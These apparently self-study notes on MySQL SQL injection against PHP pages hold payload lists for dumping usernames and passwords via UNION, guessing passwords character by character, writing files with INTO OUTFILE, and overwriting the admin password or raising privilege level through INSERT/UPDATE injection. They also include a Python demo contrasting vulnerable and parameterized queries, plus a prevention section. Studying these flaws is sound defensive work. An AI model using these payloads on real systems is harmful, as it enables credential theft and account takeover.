The heart of SQL injection is constructing SQL statements: only by using SQL flexibly can you build effective injection strings. After studying the subject I wrote up these notes so that they are ready to use at any time. Readers should understand the basic principles of SQL before going through what follows. The code in the notes was collected from the Internet.
===Basic part===
Probing a single table (here the length and the first character of the password column for the user angel):
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
UNION statements (the trailing /* comments out whatever the original query appends):
http://127.0.0.1/injection/show.php?id=1' union select 1,username, password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
Exporting to a file with INTO OUTFILE (the MySQL account needs the FILE privilege, and the path is written on the database server):
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Set the homepage value to: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
Everything after # is a MySQL comment, so the row is inserted with userlevel 3 instead of the hard-coded 1.
UPDATE statement: this one is my favourite.
First understand this SQL (the notes cut it off after WHERE):
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE
If the inputs are changed into the following forms, the injection succeeds.
1: Set the homepage value to
http://4ngel.net', userlevel='3
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass)', homepage='http://4ngel.net', userlevel='3' WHERE
userlevel is the user's privilege level, so the injected column assignment escalates the account.
2: Set the password value to
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE
The # comments out the original WHERE clause, so the admin account's password is overwritten.
3: Set the id value to
' OR username='admin'
Then, assuming the statement ends in WHERE id='$id', the SQL statement becomes
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
and the update is applied to the admin row as well.
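To watch the INSERT and UPDATE cases above actually execute, here is an added example (not code from the original notes) that runs them from Python against an in-memory SQLite database. SQLite stands in for MySQL: it has no # comment syntax, so the INSERT payload ends in -- instead of #, and the user table schema and the WHERE username='...' clause, which the notes leave out, are assumptions. The same homepage payload is then sent through a parameterized UPDATE to show it is stored as plain text.

```python
import sqlite3

# Constructed sample table mirroring the notes' `user` table. The notes do not
# show the full schema, so the column types and the one seed row are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, homepage TEXT, userlevel TEXT)")
    db.execute("INSERT INTO user (username, password, homepage, userlevel) "
               "VALUES ('angel', 'mypass', 'http://example.invalid/', '1')")
    db.commit()
    return db

def register_vulnerable(db, username, password, homepage):
    # The notes' INSERT built by string interpolation (userid is left to the
    # INTEGER PRIMARY KEY instead of the notes' ''). SQLite comments with "--"
    # rather than MySQL's "#", so the payload uses "--" to cut off the trailing
    # ", '1')" that would otherwise set userlevel to 1.
    sql = ("INSERT INTO user (username, password, homepage, userlevel) "
           "VALUES ('%s', '%s', '%s', '1')" % (username, password, homepage))
    db.execute(sql)
    db.commit()
    return sql

def update_vulnerable(db, username, password, homepage):
    # Case 1 from the notes: a quote in homepage closes the literal and the
    # rest of the value is parsed as a further column assignment.
    sql = ("UPDATE user SET password='%s', homepage='%s' WHERE username='%s'"
           % (password, homepage, username))
    db.execute(sql)
    db.commit()
    return sql

def update_safe(db, username, password, homepage):
    # Bound parameters: values travel separately from the SQL text, so the
    # same payload is stored as an ordinary string and userlevel is untouched.
    db.execute("UPDATE user SET password=?, homepage=? WHERE username=?",
               (password, homepage, username))
    db.commit()

def profile(db, username):
    return db.execute("SELECT homepage, userlevel FROM user WHERE username=?",
                      (username,)).fetchone()

INSERT_PAYLOAD = "http://4ngel.net', '3')--"
UPDATE_PAYLOAD = "http://4ngel.net', userlevel='3"

def demo():
    """Returns (new row via injected INSERT, angel via injected UPDATE,
    angel via parameterized UPDATE) as (homepage, userlevel) tuples."""
    db = make_db()
    register_vulnerable(db, "newbie", "pw", INSERT_PAYLOAD)
    update_vulnerable(db, "angel", "mypass", UPDATE_PAYLOAD)
    safe = make_db()
    update_safe(safe, "angel", "mypass", UPDATE_PAYLOAD)
    return profile(db, "newbie"), profile(db, "angel"), profile(safe, "angel")

if __name__ == "__main__":
    print(demo())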
===Advanced part===
Commonly used MySQL built-in functions (names are case-insensitive):
DATABASE()       name of the current database
USER()           the account the client connected as
SYSTEM_USER()    synonym for USER()
SESSION_USER()   synonym for USER()
CURRENT_USER()   the account the server authenticated and uses for privilege checks (can differ from USER())
VERSION()        server version string
SUBSTRING()      substring of a string
MID()            synonym for SUBSTRING()
CHAR()           builds a string from integer character codes
LOAD_FILE()      returns a file's contents (needs the FILE privilege)
...
Using the functions:
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is 'angel' written as decimal character codes; it needs no quote characters, so addslashes() has nothing to escape
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
Determine the number and type of columns in the query (a UNION only runs when the column counts match; id=-1 makes the original query return nothing, so the UNION row is what gets displayed):
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)
Guess the table name (a wrong name produces a MySQL error, which is why display_errors matters in the prevention section):
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
Cross-table query to get the user name and password (the 19 selected columns match the original query):
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
Others
# Check the first character of the password: ord(mid(password,1,1))=49 is true only if that character is '1'
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
===Injection Prevention===
Server side
magic_quotes_gpc set to On (deprecated in PHP 5.3 and removed in PHP 5.4, so this setting is not available on current PHP)
display_errors set to Off (hides the error messages that the table-name guessing above relies on; it does not remove the injection itself)
Code side
With addslashes():
$keywords = addslashes($keywords);
$keywords = str_replace("_", "\_", $keywords);   // escape LIKE wildcards
$keywords = str_replace("%", "\%", $keywords);
Or, taking magic_quotes_gpc into account so quotes are not escaped twice:
if (get_magic_quotes_gpc()) {
    // quotes are already backslashed by PHP
} else {
    $keywords = mysql_real_escape_string($keywords);
    $keywords = str_replace("_", "\_", $keywords);   // escape LIKE wildcards
    $keywords = str_replace("%", "\%", $keywords);
}
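The two str_replace() lines above are easy to misread as injection defence; they are not. Quotes are handled by mysql_real_escape_string() (or by a bound parameter), but % and _ remain wildcards inside a LIKE pattern, so an unescaped keyword of % matches every row. The added example below (Python with SQLite, not code from the notes) shows a parameterized LIKE search with and without wildcard escaping over a constructed article table; the table and its rows are assumptions.

```python
import sqlite3

# Constructed sample data for a keyword search (assumption).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER, title TEXT)")
    db.executemany("INSERT INTO article VALUES (?, ?)",
                   [(1, "snake_case style"), (2, "snakes of Asia"), (3, "100% pure")])
    db.commit()
    return db

def search_bound_only(db, keyword):
    # The keyword is a bound parameter, so quotes cannot break the SQL, but
    # LIKE still interprets % and _ inside the bound value.
    rows = db.execute("SELECT id FROM article WHERE title LIKE ? ORDER BY id",
                      ("%" + keyword + "%",))
    return [r[0] for r in rows]

def escape_like(keyword):
    # Same idea as the str_replace() lines in the notes, with the escape
    # character itself escaped first so a user-supplied backslash cannot
    # neutralise the escaping of the wildcard that follows it.
    return (keyword.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))

def search_escaped(db, keyword):
    # ESCAPE '\' tells LIKE that \% and \_ are literal characters.
    rows = db.execute("SELECT id FROM article WHERE title LIKE ? ESCAPE '\\' ORDER BY id",
                      ("%" + escape_like(keyword) + "%",))
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    for kw in ("snake_", "%"):
        print(kw, search_bound_only(db, kw), search_escaped(db, kw))
```

MySQL treats backslash as the default LIKE escape character, so the PHP snippet above gets by without an ESCAPE clause; in SQLite (and standard SQL) the clause must be spelled out.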
Useful functions
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
Note: the mysql_* extension, including mysql_real_escape_string(), was removed in PHP 7.0, and get_magic_quotes_gpc() in PHP 8.0. On current PHP use prepared statements with bound parameters (mysqli or PDO), which keep the data out of the SQL text altogether; escaping is then only needed for LIKE wildcards.
Reference articles:
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL, in Chinese)
http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)